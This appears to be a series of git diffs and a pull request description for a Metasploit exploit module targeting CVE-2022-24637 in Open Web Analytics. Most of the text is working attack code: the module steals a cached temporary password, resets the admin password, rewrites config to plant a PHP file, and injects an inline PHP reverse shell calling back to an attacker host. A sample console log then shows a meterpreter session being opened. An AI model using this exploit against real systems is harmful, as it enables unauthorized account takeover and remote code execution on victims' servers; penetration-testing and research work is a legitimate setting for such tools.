+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
         },
         'Targets' => [ ['Automatic', {}] ],
         'DisclosureDate' => '2022-03-18',
@@ -46,8 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('Username', [ true, 'Target username (Default: admin)']),
-      OptString.new('Password', [ true, 'Target new password (Default: pwned)']),
+      OptString.new('Username', [ true, 'Target username', 'admin']),
+      OptString.new('Password', [ true, 'Target new password', 'pwned']),
     ])
   end
 

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -2,6 +2,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -68,18 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
     username = datastore['Username']
     new_password = datastore['Password']
 
-    reverse_shell = "/*<?php /**/ error_reporting(0); $ip = '#{datastore['LHOST']}'; $port = #{datastore['LPORT']}; \
-      if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } \
-      if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if \
-      (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); \
-      $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) \
-      { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); \
-      break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); \
-      $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); \
-      break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; \
-      $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) \
-      { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>"
-
     res = check_connection
     if res
       print_good("Connected to #{full_uri} successfully!")
@@ -208,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'owa_nonce' => nonce,
         'owa_action' => 'base.optionsUpdate',
-        'owa_config[shell]' => reverse_shell
+        'owa_config[shell]' => payload.encoded + '?>'
       }
     )
     if !res

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -23,8 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'CVE', '2022-24637'],
           [ 'EDB', '51026'],
-          [ 'URL', 'https://devel0pment.de/?p=2494' ],
-          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24637' ]
+          [ 'URL', 'https://devel0pment.de/?p=2494' ]
         ],
         'Licence' => MSF_LICENSE,
         'Platform' => ['php'],

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -1,0 +1,299 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  require 'base64'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Open Web Analytics 1.7.3 - Remote Code Execution (RCE)',
+        'Description' => %q{
+          Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive
+          user information, which can be used to gain admin privileges by leveraging cache hashes.
+          This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled
+          by the PHP interpreter.
+        },
+        'Author' => [
+          'Jacob Ebben',    # ExploitDB Exploit Author
+          'Dennis Pfleger'  # Msf Module
+        ],
+        'References' => [
+          [ 'CVE', '2022-24637'],
+          [ 'EDB', '51026']
+        ],
+        'Licence' => MSF_LICENSE,
+        'Platform' => ['php'],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'LPORT' => '4444',
+          'Username' => 'admin',
+          'Password' => 'pwned',
+          'RPORT' => '443',
+          'SSL' => 'true'
+        },
+        'Targets' => [ ['Automatic', {}] ],
+        'DisclosureDate' => '2023-03-06',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK, # /owa-data/caches/{get_random_string(8)}.php
+            IOC_IN_LOGS, # Malicious GET/POST requests in the webservice logs
+            ACCOUNT_LOCKOUTS, # Account passwords will be changed in this module
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('Username', [ false, 'Target username (Default: admin)']),
+      OptString.new('Password', [ false, 'Target new password (Default: pwned)']),
+    ])
+  end
+
+  def check
+    res = etablish_connection
+
+    if !res.body.include?('Open Web Analytics')
+      Exploit::CheckCode::Unknown
+    elsif !res.body.include?('version=1.7.3')
+      Exploit::CheckCode::Detected
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  # This is needed to bypass self signed certificate verification
+  OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
+  I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
+  def exploit
+    base_url = get_normalized_url(datastore['RHOSTS'])
+    username = datastore['Username']
+    new_password = datastore['Password']
+
+    reverse_shell = "/*<?php /**/ error_reporting(0); $ip = '#{datastore['LHOST']}'; $port = #{datastore['LPORT']}; \
+      if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f(\"tcp://{$ip}:{$port}\"); $s_type = 'stream'; } \
+      if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if \
+      (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); \
+      $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) \
+      { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); \
+      break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\"Nlen\", $len); \
+      $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); \
+      break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; \
+      $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) \
+      { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>"
+
+    shell_filename = "#{get_random_string(8)}.php"
+    shell_url = "#{base_url}/owa-data/caches/#{shell_filename}"
+
+    res = etablish_connection
+    if res
+      print_good("Connected to #{base_url} successfully!")
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => get_random_string(8),
+        'owa_action' => 'base.login'
+      }
+    )
+    if res.code != 200
+      fail_with(Failure::Unknown, 'An error occured during the login attempt!')
+    end
+
+    print_status("Attempting to find cache of '#{username}' user")
+
+    found = false
+    cache = nil
+    100.times do |key|
+      user_id = "user_id#{key}"
+      userid_hash = Digest::MD5.hexdigest(user_id)
+      filename = "#{userid_hash}.php"
+      cache_request = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{key}/owa_user/#{filename}")
+      )
+      if cache_request.code == 404
+        next
+      end
+
+      cache_raw = cache_request.body
+      cache = get_cache_content(cache_raw)
+      cache_username = get_cache_username(cache)
+      if cache_username != username
+        print_message("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}", 'INFO')
+        next
+      else
+        found = true
+        break
+      end
+    end
+
+    if !found
+      fail_with(Failure::Unknown, "No cache found. Are you sure \"#{username}\" is a valid user?")
+    end
+
+    cache_temppass = get_cache_temppass(cache)
+    print_good("Found temporary password for user '#{username}': #{cache_temppass}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.usersPasswordEntry'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_password' => new_password,
+        'owa_password2' => new_password,
+        'owa_k' => cache_temppass,
+        'owa_action' => 'base.usersChangePassword'
+      }
+    )
+
+    if res.code != 302
+      fail_with(Failure::Unknown, 'An error occurred when changing the user password!')
+    end
+    print_good("Changed the password of '#{username}' to '#{new_password}'")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => new_password,
+        'owa_action' => 'base.login'
+      }
+    )
+
+    redirect = res['location']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => URI(redirect).path
+    )
+    if res && res.code == 200
+      print_good("Logged in as #{username} user")
+    else
+      fail_with(Failure::Unknown, "An error occurred during the login attempt of user #{username}")
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
+    )
+
+    nonce = get_update_nonce(res)
+    log_location = '/var/www/html/owa-data/caches/' + shell_filename
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[base.error_log_file]' => log_location,
+        'owa_config[base.error_log_level]' => 2
+      }
+    )
+    if !res
+      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
+    else
+      print_status('Creating log file')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[shell]' => reverse_shell
+      }
+    )
+    if !res
+      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
+    else
+      print_good('Wrote payload to file')
+    end
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
+    )
+
+    print_good('Triggering payload! Check your listener!')
+    print_status("You can trigger the payload again at '#{shell_url}")
+  end
+
+  def etablish_connection
+    url = get_normalized_url(datastore['RHOSTS'])
+    base_url = url
+    res = nil
+    loop do
+      res = Net::HTTP.get_response(URI.parse(url))
+      url = res['location']
+      break unless res.is_a?(Net::HTTPRedirection)
+    end
+    if !res
+      fail_with(Failure::Unknown, "Could not connect to #{base_url}")
+    else
+      res
+    end
+  end
+
+  def get_normalized_url(url)
+    # url += '/' unless url[-1] == '/'
+    # url = "http://#{url}" unless url.start_with?('http://', 'https://')
+    url = "https://#{url}"
+    url
+  end
+
+  def get_proxy_protocol(url)
+    url.start_with?('https://') ? 'https' : 'http'
+  end
+
+  def get_random_string(length)
+    chars = ('a'..'z').to_a + ('A'..'Z').to_a + (0..9).to_a
+    length.times.map { chars.sample }.join
+  end
+
+  def get_cache_content(cache_raw)
+    regex_cache_base64 = /\*(\w*)/
+    regex_result = cache_raw.match(regex_cache_base64)
+
+    unless regex_result
+      print_message('The provided URL does not appear to be vulnerable!', 'ERROR')
+      exit
+    end
+
+    cache_base64 = regex_result[1]
+
+    b64_string = cache_base64
+    b64_string += '=' * ((4 - cache_base64.length % 4) % 4)
+
+    cache_base64 = b64_string
+
+    Base64.decode64(cache_base64).force_encoding('ascii')
+  end
+
+  def get_cache_username(cache)
+    match = cache.match(/"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"/)
+    match[1]
+  end
+
+  def get_cache_temppass(cache)
+    match = cache.match(/"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"/)
+    match[1]
+  end
+
+  def get_update_nonce(page)
+    update_nonce = page.body.match(/owa_nonce" value="(\w*)"/)[1]
+    update_nonce
+  end
+end

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     if res && res.code != 200
-      fail_with(Failure::Unknown, 'An error occured during the login attempt!')
+      fail_with(Failure::UnexpectedReply, 'An error occured during the login attempt!')
     end
 
     print_status("Attempting to find cache of '#{username}' user")

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -21,7 +21,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'CVE', '2022-24637'],
-          [ 'EDB', '51026']
+          [ 'EDB', '51026'],
+          [ 'URL', 'https://devel0pment.de/?p=2494' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24637' ]
         ],
         'Licence' => MSF_LICENSE,
         'Platform' => ['php'],

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -217,11 +217,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')
     )
-    if !res
-      fail_with(Failure::Unknown, "Could not connect to #{full_uri}")
-    else
-      res
-    end
+    fail_with(Failure::Unreachable, "Could not connect to #{full_uri}") unless res
+    res
   end
 
   def get_cache_content(cache_raw)

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -177,7 +177,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     shell_filename = "#{rand_text_alphanumeric(8)}.php"
-    shell_url = "#{full_uri}owa-data/caches/#{shell_filename}"
 
     nonce = get_update_nonce(res)
     log_location = 'owa-data/caches/' + shell_filename
@@ -216,7 +215,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     print_good('Triggering payload! Check your listener!')
-    print_status("You can trigger the payload again at #{shell_url}")
   end
 
   def check_connection

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -52,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
 
     register_advanced_options([
-      OptInt.new('SearchLimit', [ false, 'Upper limit of user ids to check for usable cache file', 100 ])
+      OptInt.new('SearchLimit', [ false, 'Upper limit of user ids to check for usable cache file', 100 ]),
+      OptBool.new('DefangedMode', [ true, 'Run in defanged mode', true ])
     ])
   end
 
@@ -68,6 +69,20 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    if datastore['DefangedMode']
+      warning = <<~EOF
+
+
+        Are you SURE you want to execute the exploit against the target system?
+        Running this exploit will change user passwords and config files of the
+        target system.
+
+        Disable the DefangedMode option if you have authorization to proceed.
+      EOF
+
+      fail_with(Failure::BadConfig, warning)
+    end
+
     username = datastore['Username']
     new_password = datastore['Password']
 

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -230,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
     regex_result = cache_raw.match(regex_cache_base64)
 
     unless regex_result
-      fail_with(Failure::NotVulnerable, 'The provided URL does not appear to be vulnerable!')
+      fail_with(Failure::NotVulnerable, 'The serialized data can not be extracted from the cache file!')
     end
 
     Base64.decode64(regex_result[1]).force_encoding('ascii')

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -218,7 +218,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')
     )
-    fail_with(Failure::Unreachable, "Could not connect to #{full_uri}") unless res
     res
   end
 

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.code != 302
-      fail_with(Failure::Unknown, 'An error occurred when changing the user password!')
+      fail_with(Failure::UnexpectedReply, 'An error occurred when changing the user password!')
     end
     print_good("Changed the password of '#{username}' to '#{new_password}'")
 

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => 'true'
         },
         'Targets' => [ ['Automatic', {}] ],
-        'DisclosureDate' => '2023-03-06',
+        'DisclosureDate' => '2022-03-18',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -53,14 +53,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = establish_connection
+    return CheckCode::Unknown('Connection failed') unless res
+    return CheckCode::Safe if !res.body.include?('Open Web Analytics')
 
-    if !res.body.include?('Open Web Analytics')
-      Exploit::CheckCode::Unknown
-    elsif !res.body.include?('version=1.7.3')
-      Exploit::CheckCode::Detected
-    else
-      Exploit::CheckCode::Vulnerable
-    end
+    version = Rex::Version.new(res.body.scan(/version=([\d.]+)/).flatten.first)
+    return CheckCode::Detected("Open Web Analytics #{version} detected") unless version < Rex::Version.new('1.7.4')
+
+    CheckCode::Appears("Open Web Analytics #{version} is vulnerable")
   end
 
   def exploit

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'vars_post' => {
         'owa_user_id' => username,
-        'owa_password' => get_random_string(8),
+        'owa_password' => rand_text_alphanumeric(8),
         'owa_action' => 'base.login'
       }
     )
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
     )
 
-    shell_filename = "#{get_random_string(8)}.php"
+    shell_filename = "#{rand_text_alphanumeric(8)}.php"
     shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
 
     nonce = get_update_nonce(res)
@@ -248,11 +248,6 @@ class MetasploitModule < Msf::Exploit::Remote
       url = "http://#{url}"
     end
     url
-  end
-
-  def get_random_string(length)
-    chars = ('a'..'z').to_a + ('A'..'Z').to_a + (0..9).to_a
-    length.times.map { chars.sample }.join
   end
 
   def get_cache_content(cache_raw)

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -27,11 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['php'],
         'DefaultOptions' => {
           'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-          'LPORT' => '4444',
           'Username' => 'admin',
-          'Password' => 'pwned',
-          'RPORT' => '443',
-          'SSL' => 'true'
+          'Password' => 'pwned'
         },
         'Targets' => [ ['Automatic', {}] ],
         'DisclosureDate' => '2022-03-18',

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'owa_action' => 'base.login'
       }
     )
-    if res.code != 200
+    if res && res.code != 200
       fail_with(Failure::Unknown, 'An error occured during the login attempt!')
     end
 
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    if res.code != 302
+    if res && res.code != 302
       fail_with(Failure::Unknown, 'An error occurred when changing the user password!')
     end
     print_good("Changed the password of '#{username}' to '#{new_password}'")

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -227,15 +227,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def establish_connection
     url = get_normalized_url(datastore['RHOSTS'])
-    base_url = url
-    res = nil
-    loop do
-      res = Net::HTTP.get_response(URI.parse(url))
-      url = res['location']
-      break unless res.is_a?(Net::HTTPRedirection)
-    end
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')
+    )
     if !res
-      fail_with(Failure::Unknown, "Could not connect to #{base_url}")
+      fail_with(Failure::Unknown, "Could not connect to #{url}")
     else
       res
     end

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -250,10 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote
     url
   end
 
-  def get_proxy_protocol(url)
-    url.start_with?('https://') ? 'https' : 'http'
-  end
-
   def get_random_string(length)
     chars = ('a'..'z').to_a + ('A'..'Z').to_a + (0..9).to_a
     length.times.map { chars.sample }.join

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = etablish_connection
+    res = establish_connection
 
     if !res.body.include?('Open Web Analytics')
       Exploit::CheckCode::Unknown
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     shell_filename = "#{get_random_string(8)}.php"
     shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
 
-    res = etablish_connection
+    res = establish_connection
     if res
       print_good("Connected to #{base_url} successfully!")
     end
@@ -225,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("You can trigger the payload again at '#{shell_url}")
   end
 
-  def etablish_connection
+  def establish_connection
     url = get_normalized_url(datastore['RHOSTS'])
     base_url = url
     res = nil

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
       { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>"
 
     shell_filename = "#{get_random_string(8)}.php"
-    shell_url = "#{base_url}/owa-data/caches/#{shell_filename}"
+    shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
 
     res = etablish_connection
     if res

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{key}/owa_user/#{filename}")
       )
-      if cache_request.code == 404
+      if cache_request && cache_request.code == 404
         next
       end
 

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -2,7 +2,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  require 'base64'
 
   def initialize(info = {})
     super(

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -218,11 +218,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_connection
-    res = send_request_cgi(
+    send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')
     )
-    res
   end
 
   def get_cache_content(cache_raw)


### PR DESCRIPTION
This adds an exploit for [CVE-2022-24637](https://nvd.nist.gov/vuln/detail/CVE-2022-24637) which is a Remote Code Execution vulnerability for [Open Web Analytics](https://github.com/Open-Web-Analytics/Open-Web-Analytics) for versions below [1.7.4](https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4). This exploit works because files generated with `'<?php (instead of the intended "<?php sequence)` aren't handled by the PHP interpreter.

## Verification Steps
- [ ] Start a vulnerable instance of Open Web Analytics using docker and proceed with the installation
- [ ] Start msfconsole
- [ ] Run: use exploit/multi/http/open_web_analytics_rce
- [ ] Set `RHOST`, `RPORT`, `SSL`, `LHOST`, `Password`, `Username` and `SearchLimit`
- [ ] Check the target with `check`
- [ ] Run the exploit with `run`

## Example
```
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
```